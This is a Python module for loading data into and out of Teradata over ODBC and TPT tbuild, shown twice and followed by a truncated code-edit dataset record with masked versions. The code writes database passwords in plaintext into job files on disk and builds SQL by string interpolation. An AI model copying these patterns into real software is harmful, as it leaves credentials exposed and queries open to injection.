def get_session(db, usr, pwd):
    """Open an ODBC connection to Teradata and return the live session.

    The ODBC driver name is chosen by host OS (Windows installs register
    it simply as 'Teradata'); the connection itself goes through the
    teradata package's UdaExec helper.
    """
    driver = ('Teradata' if platform.system() == 'Windows' else
              'Teradata Database ODBC Driver 16.20')
    executor = teradata.UdaExec(appName='DataLoad', version='0.1',
                                logConsole=False)
    return executor.connect(method='odbc', system=db, username=usr,
                            password=pwd, driver=driver, charset='UTF8',
                            autoCommit='True', USEREGIONALSETTINGS='N',
                            transactionMode='TERADATA')
def sql2df(query, session, chunksize=100000):
    """Stream the result of *query* from Teradata and return one DataFrame.

    Rows are fetched in batches of ``chunksize`` (``pandas.read_sql`` with
    ``chunksize`` yields an iterator of DataFrames) and concatenated once
    at the end. Returns an empty DataFrame when the query yields no rows.
    """
    reader = pd.read_sql(query, session, chunksize=chunksize)
    # Accumulate the chunks in a list and concatenate a single time: the
    # original pd.concat inside the loop re-copied everything fetched so
    # far on every iteration (quadratic in the number of chunks).
    chunks = list(tqdm(reader))
    return pd.concat(chunks) if chunks else pd.DataFrame()
def check_config():
    """Ensure the Teradata TPT config file ``~/.twbcfg.ini`` exists.

    Creates ``~/tmp/teradata_logs`` for checkpoints and logs and writes a
    minimal config pointing there. An existing config file is left as-is.
    """
    path = os.path.expanduser('~')
    config_path = os.path.join(path, '.twbcfg.ini')
    log_path = os.path.join(path, 'tmp', 'teradata_logs')
    if not os.path.exists(config_path):
        # makedirs: the intermediate ~/tmp may be missing as well, in
        # which case the original os.mkdir(log_path) raised
        # FileNotFoundError.
        os.makedirs(log_path, exist_ok=True)
        config = (
            f"CheckpointDirectory='{log_path}' \n LogDirectory='{log_path}' "
            )
        with open(config_path, 'w') as f:
            f.write(config)
def td_download(query='', bd='tdsb15.cgs.sbrf.ru', username='', password='',
    fast=False, return_df=False, csv=True, chunksize=100000):
    """Fetch the result of *query* from Teradata.

    fast=False - pull over ODBC in batches of ``chunksize`` rows;
    fast=True  - export with the Teradata TPT utilities (tbuild);
    return_df  - return a DataFrame instead of a path to the dump;
    csv        - with fast=False and return_df=False: write a csv (True)
                 or a joblib dump (False);
    the query must contain WHERE so that column names can be recovered
    from the database (a ``where 1=0`` probe is spliced into it).
    Returns either a pandas.DataFrame or a path to the downloaded file.
    """
    # random suffix keeps parallel downloads from clobbering each other
    local_seed = str(random.randint(0, 1000000))
    query = query.replace('\n', ' ')
    if not fast:
        # --- plain ODBC path ---
        session = get_session(bd, username, password)
        frame = sql2df(query, session, chunksize=chunksize)
        session.close()
        if return_df:
            return frame
        else:
            path_to_file = os.path.join(os.getcwd(), 'data', 'input_' +
                local_seed)
            if csv:
                filename = path_to_file + '.csv'
                frame.to_csv(filename, sep=';', index=False, encoding='utf8')
                return filename
            else:
                dump(frame, path_to_file)
                return path_to_file
    else:
        # --- fast path: TPT export into a csv on disk ---
        check_config()
        # double the single quotes so the query can be embedded in the
        # TPT job-variables file below
        query = query.replace("'", "''")
        path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' +
            local_seed)
        if os.path.exists(path_to_folder):
            shutil.rmtree(path_to_folder)
            os.mkdir(path_to_folder)
        else:
            os.mkdir(path_to_folder)
        path_to_file = os.path.join(path_to_folder, 'dataset.csv')
        open(path_to_file, 'w').close()
        # job variables consumed by tbuild via the -v option
        txt = (
            """SourceTdpId = '%s'
 ,SourceUserName = '%s'
 ,SourceUserPassword = '%s'
 ,DDLPrivateLogName = 'ddlprivate.log'
 ,ExportPrivateLogName = 'exportprivate.log'
 ,TargetErrorList = ['3807']
 ,TargetFileName = '%s'
 ,TargetFormat = 'delimited'
 ,TargetTextDelimiter = ';'
 ,TargetOpenMode = 'write'
 ,SelectStmt = '%s' """
            % (bd, username, password, path_to_file, query))
        qtxt = """USING CHAR SET UTF-8
        DEFINE JOB qstart2
        (
        APPLY TO OPERATOR ($FILE_WRITER)
        SELECT * FROM OPERATOR($EXPORT);
        );"""
        with open(path_to_folder + '/qstart2.txt', 'w+') as f:
            f.write(qtxt)
        with open(path_to_folder + '/jobvars.txt', 'w+') as f:
            f.write(txt)
        # NOTE(review): tbuild is pointed at {folder}/tdd.txt, but only
        # qstart2.txt and jobvars.txt are written here -- presumably
        # tdd.txt is expected to pre-exist; confirm (qstart2.txt looks
        # unused by this command line).
        p = subprocess.run(shlex.split(
            f'tbuild -f {path_to_folder}/tdd.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}'
            ), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        # the TPT dump has no header row: recover the column names with an
        # empty probe built by splitting the query on its (single) 'where'
        query = query.replace('\n', ' ').replace("''", "'")
        query = query.lower()
        query_list = query.split('where')
        if len(query_list) == 2:
            columns_query = ' where 1=0 and '.join(query_list)
            session = get_session(bd, username, password)
            columns_names = pd.read_sql(columns_query, session).columns.tolist(
                )
            session.close()
        else:
            print("Coudn't load columns names")
            columns_names = None
        if not return_df:
            if columns_names:
                with open(path_to_folder + '/columns_names.txt', 'w') as f:
                    f.write('\n'.join(columns_names))
            return path_to_file
        else:
            if columns_names:
                frame = pd.read_csv(path_to_file, names=columns_names,
                    delimiter=';')
            else:
                frame = pd.read_csv(path_to_file, header=None, delimiter=';')
            return frame
def py2td(x):
    """Convert a Python value for insertion into Teradata.

    Whole-number floats are narrowed to ``int`` and the string
    ``'null'`` is mapped to ``None`` (SQL NULL); every other value is
    passed through unchanged.
    """
    # isinstance (rather than ``type(x) == float``) also narrows float
    # subclasses such as numpy.float64, which this module produces.
    if isinstance(x, float):
        # float.is_integer() is the canonical whole-number test; like the
        # old ``x % 1 == 0`` it is False for NaN and +/-infinity.
        return int(x) if x.is_integer() else x
    if x == 'null':
        return None
    return x
def td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name='',
              schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None,
              path_to_file=None, fast=False, batch_size=12000,
              max_sessions=6, buffersize=524288):
    """Write data into Teradata via the TPT utilities or ODBC.

    Parameters
    ----------
    username, password, bd : Teradata credentials and server.
    tbl_name, schema : target table name and schema.
    loadframe : True -- take data from ``df``; False -- read ``path_to_file``.
    df : DataFrame to load when ``loadframe`` is True.
    path_to_file : ``;``-separated utf8 csv to load when ``loadframe`` is False.
    fast : True -- TPT fastload through ``tbuild``; False -- ODBC executemany.
    batch_size : rows per ODBC batch.
    max_sessions, buffersize : TPT load tuning knobs.
    """
    table = schema + '.' + tbl_name
    if not fast:
        # --- ODBC path: batched INSERT ... VALUES through executemany ---
        if not loadframe:
            # BUG FIX: pd.read_csv() has no ``index`` keyword; the old
            # ``index=False`` argument raised TypeError on this path.
            df = pd.read_csv(path_to_file, sep=';', encoding='utf8')
        n_iters = len(df) // batch_size + (len(df) % batch_size > 0)
        df_dict = df.to_dict('records')
        session = get_session(bd, username, password)
        for i in tqdm(range(n_iters), total=n_iters):
            session.executemany(
                f"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})",
                [list(row.values()) for row in df_dict[i * batch_size:i * batch_size + batch_size]],
                batch=True
            )
        session.close()
    else:
        # --- TPT fastload path: stage a csv on disk, load into a temp table ---
        check_config()
        local_seed = str(random.randint(0, 1000000))
        path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' + local_seed)
        # BUG FIX: the old code removed an existing folder without recreating
        # it, so every later write into the folder failed; the folder is now
        # always (re)created.
        if os.path.exists(path_to_folder):
            shutil.rmtree(path_to_folder)
        os.mkdir(path_to_folder)
        if loadframe:
            converted = df.replace(np.NaN, '').astype(str)
            path_to_file = path_to_folder + '/tmp.csv'
            converted.to_csv(path_to_file, index=False, header=False, sep=';', encoding='utf8')
            # max utf-8 byte length per column -- used to size the TPT VARCHAR schema
            converted_len = converted.apply(lambda x: x.str.encode('utf-8').apply(len)).max().to_dict()
        else:
            # sample the file to estimate column widths; column names come from
            # an empty probe query against the target table
            converted_len = pd.read_csv(path_to_file, sep=';', dtype='str', header=None,
                                        encoding='utf8', low_memory=False, nrows=100000)
            columns_query = f'select * from {table} where 1=0'
            session = get_session(bd, username, password)
            columns_names = pd.read_sql(columns_query, session).columns.tolist()
            session.close()
            # copy (not move) so the caller's file is left in place
            shutil.copy(path_to_file, path_to_folder + '/tmp.csv')
            converted_len.columns = columns_names
            converted_len = converted_len.apply(lambda x: x.str.encode('utf-8').apply(len)).max().to_dict()
        # load into a fresh temporary table first, then merge into the target
        td_temp_table = table + '_tmp_' + local_seed
        session = get_session(bd, username, password)
        session.execute(
            f'create multiset table {td_temp_table} as {table} with no data no primary index'
        )
        session.close()
        # TPT job: file-reader producer -> LOAD operator into the temp table
        txt = f"""USING CHARACTER SET UTF8
        DEFINE JOB teradata_upload
        Description 'Fastload script'
        (
            DEFINE OPERATOR Load_operator
            TYPE LOAD
            SCHEMA *
            ATTRIBUTES
            (
                VARCHAR TdPid='{bd}',
                VARCHAR UserName='{username}',
                VARCHAR UserPassWord='{password}',
                VARCHAR TargetTable='{td_temp_table}',
                VARCHAR LogTable='{schema}.usr_tpt_log',
                VARCHAR DateForm='AnsiDate',
                INTEGER MaxSessions={max_sessions}
            );

            DEFINE SCHEMA Define_Employee_Schema
            (
                {','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in converted_len.items())} 
            );

            DEFINE OPERATOR Producer_File_Detail
            TYPE DATACONNECTOR PRODUCER
            SCHEMA Define_Employee_Schema
            ATTRIBUTES
            (
                VARCHAR DirectoryPath='{path_to_folder}/'
                , VARCHAR FileName='tmp.csv'
                , VARCHAR TextDelimiter=';'
                , VARCHAR QuotedData = 'Optional'
                , VARCHAR OpenQuoteMark = '"'
                , VARCHAR CloseQuoteMark = '"'
                , VARCHAR Format='Delimited'
                , VARCHAR OpenMode='Read'
                , VARCHAR INDICATORMODE='N'
                , INTEGER BUFFERSIZE = {buffersize}
            );

            APPLY
            (
                'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'
            )
            TO OPERATOR(Load_operator)

            SELECT * FROM OPERATOR (Producer_File_Detail);
        );"""
        with open(path_to_folder + '/load_code.tpt', 'w+') as f:
            f.write(txt)
        # run the TPT load
        p = subprocess.Popen(
            shlex.split(f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}')
        )
        p.wait()
        # merge the temp table into the target
        print('Merging in Teradata... \r', end='', flush=True)
        session = get_session(bd, username, password)
        session.execute(f'insert into {table} sel * from {td_temp_table}')
        session.close()
        # drop the temporary table
        print('Cleaning... \r', end='', flush=True)
        session = get_session(bd, username, password)
        session.execute(f'drop table {td_temp_table}')
        session.close()
        # remove the staging folder
        shutil.rmtree(path_to_folder)
        print('Done!')
<|reserved_special_token_1|>
import os
import numpy as np
import pandas as pd
import random
import platform
import subprocess
import shlex
import teradata
from joblib import dump
import shutil
from tqdm import tqdm
def get_session(db, usr, pwd):
    """Establish an ODBC connection to Teradata and return the session."""
    # The ODBC driver is registered under a different name on Windows.
    driver_name = ('Teradata' if platform.system() == 'Windows'
                   else 'Teradata Database ODBC Driver 16.20')
    uda_exec = teradata.UdaExec(appName='DataLoad', version='0.1',
                                logConsole=False)
    connection_options = {
        'method': 'odbc',
        'system': db,            # TD server
        'username': usr,         # TD login
        'password': pwd,         # TD password
        'driver': driver_name,
        'charset': 'UTF8',
        'autoCommit': 'True',
        'USEREGIONALSETTINGS': 'N',
        'transactionMode': 'TERADATA',
    }
    return uda_exec.connect(**connection_options)
def sql2df(query, session, chunksize=100000):
    """Read *query* from Teradata in batches of ``chunksize`` rows and
    glue them into a single DataFrame.

    The chunks are collected first and concatenated once: the old
    per-chunk ``pd.concat`` inside the loop re-copied every previously
    read row on each iteration (accidentally quadratic).
    """
    chunks = [chunk for chunk in tqdm(pd.read_sql(query, session, chunksize=chunksize))]
    if not chunks:
        # preserve the old behaviour: an empty result yields an empty
        # DataFrame instead of pd.concat raising on an empty list
        return pd.DataFrame()
    return pd.concat(chunks)
def check_config():
    """Write the TPT config file ``~/.twbcfg.ini`` if it is missing.

    Points the TPT checkpoint and log directories at
    ``~/tmp/teradata_logs``, creating that directory on first use.
    Does nothing when the config file already exists.
    """
    home = os.path.expanduser('~')
    config_path = os.path.join(home, '.twbcfg.ini')
    log_path = os.path.join(home, 'tmp', 'teradata_logs')
    if os.path.exists(config_path):
        return  # already configured by a previous run
    # BUG FIX: os.mkdir(log_path) raised FileNotFoundError when the
    # intermediate ~/tmp directory was missing; makedirs creates it too.
    os.makedirs(log_path, exist_ok=True)
    config = f'''CheckpointDirectory='{log_path}'
   LogDirectory='{log_path}' '''
    with open(config_path, 'w') as f:
        f.write(config)
def td_download(query='', bd='tdsb15.cgs.sbrf.ru', username='', password='',
                fast=False, return_df=False, csv=True, chunksize=100000):
    """Fetch data from Teradata and return a file path or a DataFrame.

    fast : True -- use the TPT utilities (tbuild), False -- ODBC.
    return_df : return a DataFrame instead of writing a file.
    csv : when fast=False and a file is requested, write csv (else joblib dump).
    chunksize : batch size for the ODBC reader.
    The query must contain WHERE so column names can be probed from the DB.
    """
    local_seed = str(random.randint(0, 1000000))
    query = query.replace('\n', ' ')
    if not fast:
        # --- ODBC path: stream the query through pandas ---
        session = get_session(bd, username, password)
        frame = sql2df(query, session, chunksize=chunksize)
        session.close()
        if return_df:
            return frame
        path_to_file = os.path.join(os.getcwd(), 'data', 'input_' + local_seed)
        if csv:
            filename = path_to_file + '.csv'
            frame.to_csv(filename, sep=';', index=False, encoding='utf8')
            return filename
        dump(frame, path_to_file)
        return path_to_file
    else:
        # --- TPT FastExport path: write job files and run tbuild ---
        check_config()
        query = query.replace("'", "''")  # double single-quotes for the TPT script
        path_to_folder = os.path.join(os.getcwd(), 'data', 'input_' + local_seed)
        if os.path.exists(path_to_folder):
            shutil.rmtree(path_to_folder)
        os.mkdir(path_to_folder)
        path_to_file = os.path.join(path_to_folder, 'dataset.csv')
        open(path_to_file, 'w').close()
        # job variables consumed by the $EXPORT/$FILE_WRITER template operators
        txt = '''SourceTdpId = '%s'
                ,SourceUserName = '%s' 
                ,SourceUserPassword = '%s'
                ,DDLPrivateLogName = 'ddlprivate.log'
                ,ExportPrivateLogName = 'exportprivate.log'
                ,TargetErrorList = ['3807']
                ,TargetFileName = '%s'
                ,TargetFormat = 'delimited'
                ,TargetTextDelimiter = ';'
                ,TargetOpenMode = 'write'
                ,SelectStmt = '%s' ''' % (bd, username, password, path_to_file, query)
        qtxt = '''USING CHAR SET UTF-8
        DEFINE JOB qstart2
        (
          APPLY TO OPERATOR ($FILE_WRITER)
          SELECT * FROM OPERATOR($EXPORT);
        );'''
        with open(path_to_folder + '/qstart2.txt', 'w+') as f:
            f.write(qtxt)
        with open(path_to_folder + '/jobvars.txt', 'w+') as f:
            f.write(txt)
        # BUG FIX: tbuild was pointed at {path_to_folder}/tdd.txt, a file that
        # is never created; the job script actually written is qstart2.txt.
        p = subprocess.run(
            shlex.split(f'tbuild -f {path_to_folder}/qstart2.txt -v {path_to_folder}/jobvars.txt -j tdd_{str(local_seed)}'),
            stdout=subprocess.PIPE, stderr=subprocess.STDOUT
        )
        # probe column names: splice "1=0" into the WHERE clause so the
        # probe query returns zero rows but a full header
        query = query.replace('\n', ' ').replace("''", "'")
        query = query.lower()
        query_list = query.split('where')
        if len(query_list) == 2:
            columns_query = ' where 1=0 and '.join(query_list)
            session = get_session(bd, username, password)
            columns_names = pd.read_sql(columns_query, session).columns.tolist()
            session.close()
        else:
            print("Couldn't load columns names")  # typo fixed ("Coudn't")
            columns_names = None
        if not return_df:
            if columns_names:
                with open(path_to_folder + '/columns_names.txt', 'w') as f:
                    f.write('\n'.join(columns_names))
            return path_to_file
        if columns_names:
            frame = pd.read_csv(path_to_file, names=columns_names, delimiter=';')
        else:
            frame = pd.read_csv(path_to_file, header=None, delimiter=';')
        return frame
def py2td(x):
    """Convert a Python value for insertion into Teradata.

    Whole-number floats are narrowed to ``int`` and the string
    ``'null'`` is mapped to ``None`` (SQL NULL); every other value is
    passed through unchanged.
    """
    # isinstance (rather than ``type(x) == float``) also narrows float
    # subclasses such as numpy.float64, which this module produces.
    if isinstance(x, float):
        # float.is_integer() is the canonical whole-number test; like the
        # old ``x % 1 == 0`` it is False for NaN and +/-infinity.
        return int(x) if x.is_integer() else x
    if x == 'null':
        return None
    return x
def td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name='',
              schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None,
              path_to_file=None, fast=False, batch_size=12000,
              max_sessions=6, buffersize=524288):
    """Write data into Teradata via the TPT utilities or ODBC.

    Parameters
    ----------
    username, password, bd : Teradata credentials and server.
    tbl_name, schema : target table name and schema.
    loadframe : True -- take data from ``df``; False -- read ``path_to_file``.
    df : DataFrame to load when ``loadframe`` is True.
    path_to_file : ``;``-separated utf8 csv to load when ``loadframe`` is False.
    fast : True -- TPT fastload through ``tbuild``; False -- ODBC executemany.
    batch_size : rows per ODBC batch.
    max_sessions, buffersize : TPT load tuning knobs.
    """
    table = schema + '.' + tbl_name
    if not fast:
        # --- ODBC path: batched INSERT ... VALUES through executemany ---
        if not loadframe:
            # BUG FIX: pd.read_csv() has no ``index`` keyword; the old
            # ``index=False`` argument raised TypeError on this path.
            df = pd.read_csv(path_to_file, sep=';', encoding='utf8')
        n_iters = len(df) // batch_size + (len(df) % batch_size > 0)
        df_dict = df.to_dict('records')
        session = get_session(bd, username, password)
        for i in tqdm(range(n_iters), total=n_iters):
            session.executemany(
                f"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})",
                [list(row.values()) for row in df_dict[i * batch_size:i * batch_size + batch_size]],
                batch=True
            )
        session.close()
    else:
        # --- TPT fastload path: stage a csv on disk, load into a temp table ---
        check_config()
        local_seed = str(random.randint(0, 1000000))
        path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' + local_seed)
        # BUG FIX: the old code removed an existing folder without recreating
        # it, so every later write into the folder failed; the folder is now
        # always (re)created.
        if os.path.exists(path_to_folder):
            shutil.rmtree(path_to_folder)
        os.mkdir(path_to_folder)
        if loadframe:
            converted = df.replace(np.NaN, '').astype(str)
            path_to_file = path_to_folder + '/tmp.csv'
            converted.to_csv(path_to_file, index=False, header=False, sep=';', encoding='utf8')
            # max utf-8 byte length per column -- used to size the TPT VARCHAR schema
            converted_len = converted.apply(lambda x: x.str.encode('utf-8').apply(len)).max().to_dict()
        else:
            # sample the file to estimate column widths; column names come from
            # an empty probe query against the target table
            converted_len = pd.read_csv(path_to_file, sep=';', dtype='str', header=None,
                                        encoding='utf8', low_memory=False, nrows=100000)
            columns_query = f'select * from {table} where 1=0'
            session = get_session(bd, username, password)
            columns_names = pd.read_sql(columns_query, session).columns.tolist()
            session.close()
            # copy (not move) so the caller's file is left in place
            shutil.copy(path_to_file, path_to_folder + '/tmp.csv')
            converted_len.columns = columns_names
            converted_len = converted_len.apply(lambda x: x.str.encode('utf-8').apply(len)).max().to_dict()
        # load into a fresh temporary table first, then merge into the target
        td_temp_table = table + '_tmp_' + local_seed
        session = get_session(bd, username, password)
        session.execute(
            f'create multiset table {td_temp_table} as {table} with no data no primary index'
        )
        session.close()
        # TPT job: file-reader producer -> LOAD operator into the temp table
        txt = f"""USING CHARACTER SET UTF8
        DEFINE JOB teradata_upload
        Description 'Fastload script'
        (
            DEFINE OPERATOR Load_operator
            TYPE LOAD
            SCHEMA *
            ATTRIBUTES
            (
                VARCHAR TdPid='{bd}',
                VARCHAR UserName='{username}',
                VARCHAR UserPassWord='{password}',
                VARCHAR TargetTable='{td_temp_table}',
                VARCHAR LogTable='{schema}.usr_tpt_log',
                VARCHAR DateForm='AnsiDate',
                INTEGER MaxSessions={max_sessions}
            );

            DEFINE SCHEMA Define_Employee_Schema
            (
                {','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in converted_len.items())} 
            );

            DEFINE OPERATOR Producer_File_Detail
            TYPE DATACONNECTOR PRODUCER
            SCHEMA Define_Employee_Schema
            ATTRIBUTES
            (
                VARCHAR DirectoryPath='{path_to_folder}/'
                , VARCHAR FileName='tmp.csv'
                , VARCHAR TextDelimiter=';'
                , VARCHAR QuotedData = 'Optional'
                , VARCHAR OpenQuoteMark = '"'
                , VARCHAR CloseQuoteMark = '"'
                , VARCHAR Format='Delimited'
                , VARCHAR OpenMode='Read'
                , VARCHAR INDICATORMODE='N'
                , INTEGER BUFFERSIZE = {buffersize}
            );

            APPLY
            (
                'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'
            )
            TO OPERATOR(Load_operator)

            SELECT * FROM OPERATOR (Producer_File_Detail);
        );"""
        with open(path_to_folder + '/load_code.tpt', 'w+') as f:
            f.write(txt)
        # run the TPT load
        p = subprocess.Popen(
            shlex.split(f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}')
        )
        p.wait()
        # merge the temp table into the target
        print('Merging in Teradata... \r', end='', flush=True)
        session = get_session(bd, username, password)
        session.execute(f'insert into {table} sel * from {td_temp_table}')
        session.close()
        # drop the temporary table
        print('Cleaning... \r', end='', flush=True)
        session = get_session(bd, username, password)
        session.execute(f'drop table {td_temp_table}')
        session.close()
        # remove the staging folder
        shutil.rmtree(path_to_folder)
        print('Done!')
|
flexible
|
{
"blob_id": "a05c94ae0ee41cfef5687f741e07a54ae793e40d",
"index": 2183,
"step-1": "<mask token>\n\n\ndef get_session(db, usr, pwd):\n \"\"\"Функция устанавливает соединение с ТД и возвращает сессию\"\"\"\n if platform.system() == 'Windows':\n driver = 'Teradata'\n else:\n driver = 'Teradata Database ODBC Driver 16.20'\n udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',\n logConsole=False)\n session = udaExec.connect(method='odbc', system=db, username=usr,\n password=pwd, driver=driver, charset='UTF8', autoCommit='True',\n USEREGIONALSETTINGS='N', transactionMode='TERADATA')\n return session\n\n\ndef sql2df(query, session, chunksize=100000):\n \"\"\" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу \"\"\"\n db = pd.read_sql(query, session, chunksize=chunksize)\n data = pd.DataFrame()\n for x in tqdm(db):\n data = pd.concat([data, x])\n return data\n\n\ndef check_config():\n \"\"\" .twbcfg.ini to root path \"\"\"\n path = os.path.expanduser('~')\n config_path = os.path.join(path, '.twbcfg.ini')\n log_path = os.path.join(path, 'tmp', 'teradata_logs')\n if not os.path.exists(config_path):\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n config = (\n f\"CheckpointDirectory='{log_path}' \\n LogDirectory='{log_path}' \"\n )\n with open(config_path, 'w') as f:\n f.write(config)\n\n\n<mask token>\n\n\ndef py2td(x):\n \"\"\"Функция вставляет пропуски и корректирует тип данных под ТД\"\"\"\n x_type = type(x)\n if x_type == float:\n if x % 1 == 0:\n return int(x)\n else:\n return x\n elif x == 'null':\n return None\n else:\n return x\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_session(db, usr, pwd):\n \"\"\"Функция устанавливает соединение с ТД и возвращает сессию\"\"\"\n if platform.system() == 'Windows':\n driver = 'Teradata'\n else:\n driver = 'Teradata Database ODBC Driver 16.20'\n udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',\n logConsole=False)\n session = udaExec.connect(method='odbc', system=db, username=usr,\n password=pwd, driver=driver, charset='UTF8', autoCommit='True',\n USEREGIONALSETTINGS='N', transactionMode='TERADATA')\n return session\n\n\ndef sql2df(query, session, chunksize=100000):\n \"\"\" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу \"\"\"\n db = pd.read_sql(query, session, chunksize=chunksize)\n data = pd.DataFrame()\n for x in tqdm(db):\n data = pd.concat([data, x])\n return data\n\n\ndef check_config():\n \"\"\" .twbcfg.ini to root path \"\"\"\n path = os.path.expanduser('~')\n config_path = os.path.join(path, '.twbcfg.ini')\n log_path = os.path.join(path, 'tmp', 'teradata_logs')\n if not os.path.exists(config_path):\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n config = (\n f\"CheckpointDirectory='{log_path}' \\n LogDirectory='{log_path}' \"\n )\n with open(config_path, 'w') as f:\n f.write(config)\n\n\n<mask token>\n\n\ndef py2td(x):\n \"\"\"Функция вставляет пропуски и корректирует тип данных под ТД\"\"\"\n x_type = type(x)\n if x_type == float:\n if x % 1 == 0:\n return int(x)\n else:\n return x\n elif x == 'null':\n return None\n else:\n return x\n\n\ndef td_import(username='', password='', bd='tdsb15.cgs.sbrf.ru', tbl_name=\n '', schema='SBX_RETAIL_MP_PFM', loadframe=True, df=None, path_to_file=\n None, fast=False, batch_size=12000, max_sessions=6, buffersize=524288):\n \"\"\"\n Функция записывате данные в ТД через утилиты или ODBC\n\n \"\"\"\n table = schema + '.' 
+ tbl_name\n if not fast:\n if not loadframe:\n df = pd.read_csv(path_to_file, sep=';', encoding='utf8', index=\n False)\n n_iters = len(df) // batch_size + (len(df) % batch_size > 0)\n df_dict = df.to_dict('records')\n session = get_session(bd, username, password)\n for i in tqdm(range(n_iters), total=n_iters):\n session.executemany(\n f\"INSERT INTO {table} VALUES ({','.join(list('?' * df.shape[1]))})\"\n , [list(row.values()) for row in df_dict[i * batch_size:i *\n batch_size + batch_size]], batch=True)\n session.close()\n else:\n check_config()\n local_seed = str(random.randint(0, 1000000))\n path_to_folder = os.path.join(os.getcwd(), 'data', 'output_' +\n local_seed)\n if os.path.exists(path_to_folder):\n shutil.rmtree(path_to_folder)\n else:\n os.mkdir(path_to_folder)\n if loadframe:\n converted = df.replace(np.NaN, '').astype(str)\n path_to_file = path_to_folder + '/tmp.csv'\n converted.to_csv(path_to_file, index=False, header=False, sep=\n ';', encoding='utf8')\n converted_len = converted.apply(lambda x: x.str.encode('utf-8')\n .apply(len)).max().to_dict()\n else:\n converted_len = pd.read_csv(path_to_file, sep=';', dtype='str',\n header=None, encoding='utf8', low_memory=False, nrows=100000)\n columns_query = f'select * from {table} where 1=0'\n session = get_session(bd, username, password)\n columns_names = pd.read_sql(columns_query, session).columns.tolist(\n )\n session.close()\n shutil.copy(path_to_file, path_to_folder + '/tmp.csv')\n converted_len.columns = columns_names\n converted_len = converted_len.apply(lambda x: x.str.encode(\n 'utf-8').apply(len)).max().to_dict()\n td_temp_table = table + '_tmp_' + local_seed\n session = get_session(bd, username, password)\n session.execute(\n f'create multiset table {td_temp_table} as {table} with no data no primary index'\n )\n session.close()\n txt = f\"\"\"USING CHARACTER SET UTF8\n DEFINE JOB teradata_upload\n Description 'Fastload script'\n (\n DEFINE OPERATOR Load_operator\n TYPE LOAD\n SCHEMA *\n 
ATTRIBUTES\n (\n VARCHAR TdPid='{bd}',\n VARCHAR UserName='{username}',\n VARCHAR UserPassWord='{password}',\n VARCHAR TargetTable='{td_temp_table}',\n VARCHAR LogTable='{schema}.usr_tpt_log',\n VARCHAR DateForm='AnsiDate',\n INTEGER MaxSessions={max_sessions}\n );\n\n DEFINE SCHEMA Define_Employee_Schema\n (\n {','.join(f'{key} VARCHAR({max(1, value * 2)})' for key, value in converted_len.items())} \n );\n\n DEFINE OPERATOR Producer_File_Detail\n TYPE DATACONNECTOR PRODUCER\n SCHEMA Define_Employee_Schema\n ATTRIBUTES\n (\n VARCHAR DirectoryPath='{path_to_folder}/'\n , VARCHAR FileName='tmp.csv'\n , VARCHAR TextDelimiter=';'\n , VARCHAR QuotedData = 'Optional'\n , VARCHAR OpenQuoteMark = '\"'\n , VARCHAR CloseQuoteMark = '\"'\n , VARCHAR Format='Delimited'\n , VARCHAR OpenMode='Read'\n , VARCHAR INDICATORMODE='N'\n , INTEGER BUFFERSIZE = {buffersize}\n );\n\n APPLY\n (\n 'INSERT INTO {td_temp_table}({','.join(f'{key}' for key, value in converted_len.items())}) VALUES (:{',:'.join(f'{key}' for key, value in converted_len.items())});'\n )\n TO OPERATOR(Load_operator)\n\n SELECT * FROM OPERATOR (Producer_File_Detail);\n );\"\"\"\n with open(path_to_folder + '/load_code.tpt', 'w+') as f:\n f.write(txt)\n p = subprocess.Popen(shlex.split(\n f'tbuild -f {path_to_folder}/load_code.tpt -L {path_to_folder}'))\n p.wait()\n print('Merging in Teradata... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'insert into {table} sel * from {td_temp_table}')\n session.close()\n print('Cleaning... \\r', end='', flush=True)\n session = get_session(bd, username, password)\n session.execute(f'drop table {td_temp_table}')\n session.close()\n shutil.rmtree(path_to_folder)\n print('Done!')\n",
"step-3": "<mask token>\n\n\ndef get_session(db, usr, pwd):\n \"\"\"Функция устанавливает соединение с ТД и возвращает сессию\"\"\"\n if platform.system() == 'Windows':\n driver = 'Teradata'\n else:\n driver = 'Teradata Database ODBC Driver 16.20'\n udaExec = teradata.UdaExec(appName='DataLoad', version='0.1',\n logConsole=False)\n session = udaExec.connect(method='odbc', system=db, username=usr,\n password=pwd, driver=driver, charset='UTF8', autoCommit='True',\n USEREGIONALSETTINGS='N', transactionMode='TERADATA')\n return session\n\n\ndef sql2df(query, session, chunksize=100000):\n \"\"\" Функция грузит из терадаты данные в батчах по 100к и склеивает их в одну таблицу \"\"\"\n db = pd.read_sql(query, session, chunksize=chunksize)\n data = pd.DataFrame()\n for x in tqdm(db):\n data = pd.concat([data, x])\n return data\n\n\ndef check_config():\n \"\"\" .twbcfg.ini to root path \"\"\"\n path = os.path.expanduser('~')\n config_path = os.path.join(path, '.twbcfg.ini')\n log_path = os.path.join(path, 'tmp', 'teradata_logs')\n if not os.path.exists(config_path):\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n config = (\n f\"CheckpointDirectory='{log_path}' \\n LogDirectory='{log_path}' \"\n )\n with open(config_path, 'w') as f:\n 